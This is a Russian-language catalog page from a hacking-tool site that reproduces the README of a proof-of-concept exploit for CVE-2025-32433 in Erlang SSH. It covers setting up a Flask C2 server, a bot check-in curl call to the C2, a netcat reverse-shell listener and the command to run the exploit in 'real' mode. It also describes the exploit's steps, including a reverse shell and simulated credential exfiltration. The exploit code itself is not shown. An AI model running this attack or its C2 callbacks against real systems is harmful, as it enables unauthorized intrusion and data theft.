Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
POC_CVE-2025-32433 — Доказательство концепции эксплуатации уязвимости CVE-2025-32433 с симулированными и реальными режимами атаки, включая C2-сервер на основе Flask для обратных вызовов reverse shell и симуляции пост-эксплуатации. | Kitploit
Инструменты/GitHubGitHub/ekomssavior/poc_cve-2025-32433
Анализ уязвимостейЭксплуатацияТестирование на ПроникновениеКомандование и УправлениеRed TeamingРазработка Полезной Нагрузки
GitHubekomssavior/poc_cve-2025-32433

POC_CVE-2025-32433

Доказательство концепции эксплуатации уязвимости CVE-2025-32433 с симулированными и реальными режимами атаки, включая C2-сервер на основе Flask для обратных вызовов reverse shell и симуляции пост-эксплуатации.

Репозиторий
5271 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

⚠️ Этическое предупреждение

Этот репозиторий содержит код, демонстрирующий реальный CVE (CVE-2025-32433).
Используйте его только в средах, где у вас есть явное разрешение.

Никогда не тестируйте этот эксплойт против систем, которыми вы не владеете или не управляете.
Несанкционированное использование незаконно, неэтично и наносит вред сообществу кибербезопасности.

симуляционный и реальный POC для CVE-2025-32433

Мой кореш Chocapikk показал мне этот найденный poc erling_cve.py, я заинтересовался и захотел протестировать его в безопасной среде.

У вас есть два варианта с этим репозиторием: безопасный симуляционный скрипт и система, которые я описываю ниже.

Или вы можете использовать настоящий erling_cve.py (этичным способом, с осторожностью и только в сетях, на которые у вас есть разрешение для тестирования)

Перед использованием этого инструмента для тестирования или запуска реального эксплойта ознакомьтесь с моим корешем m0usemm0use и его python-скриптом для поиска уязвимых целей CVE-2025-32433!!!!

https://github.com/m0usem0use/erl_mouse


СИМУЛЯЦИОННАЯ версия эксплойта для cve-2025-32433

Настройка сервера C2

создайте C2 на основе Python Flask: мощный для обратных вызовов ботов или обратных оболочек.

Запустите этот скрипт установки на сервере C2

apt update && apt install python3-pip git -y

sudo apt install python3-flask

mkdir ~/c2

cd ~/c2

nano c2_server.py (вставьте скрипт c2_server и отредактируйте по необходимости)

run

python3 c2_server.py

боты (или тестовые скрипты) могут сделать curl домой так

curl -X POST http://:8080/report -d "Bot is online"

Настройка Python venv на Kali

mkdir ~/ssh-bot-lab && cd ~/ssh-bot-lab

Создайте виртуальное окружение Python

python3 -m venv venv

source venv/bin/activate

sudo apt install python3-requests

Тестирование обратного вызова

nano test_callback.py (вставьте скрипт test_callback и отредактируйте по необходимости)

запустите обратный вызов

python3 test_callback.py

Теперь у вас официально есть

A working venv

A live cloud C2

Functional callback injection

-Вам нужно, чтобы на целевой/жертвенной машине был открыт процесс или сервис Erlang (или симулирован)


ЧТО ДЕЛАЕТ Eerling_cve.py?

Подключается к порту 22 целевого IP

Отправляет поддельную строку версии SSH

Отправляет специально сформированный пакет (предположительно для запуска уязвимости — имитируя злоупотребление чем-то вроде недокументированного обработчика SSH Erlang или переполнения буфера)

Запускает обратную оболочку к IP атакующего

Симулирует постэксплуатацию, выполняя команды whoami, uname и ложный 'вывод учетных данных' в /tmp/exfil.log

Мы возьмем наш найденный Erlang-подобный PoC и

Сделаем его функциональным внутри Kali venv

Подключим его к отправке отчетов нашему облачному C2, когда запускается "атака"

Запустим его этично и безопасно в контролируемой лаборатории

Наблюдаем, как он создает /tmp/exfil.log для симуляции украденных данных


с машины Kali

nano poc_erlang_test.py

-вставьте poc_erlang_test.py и отредактируйте по необходимости

Откройте слушатель

в новом терминале выполните

nc -lvnp 4444

запустите poc

python poc_erlang_test.py --real

Скачать инструмент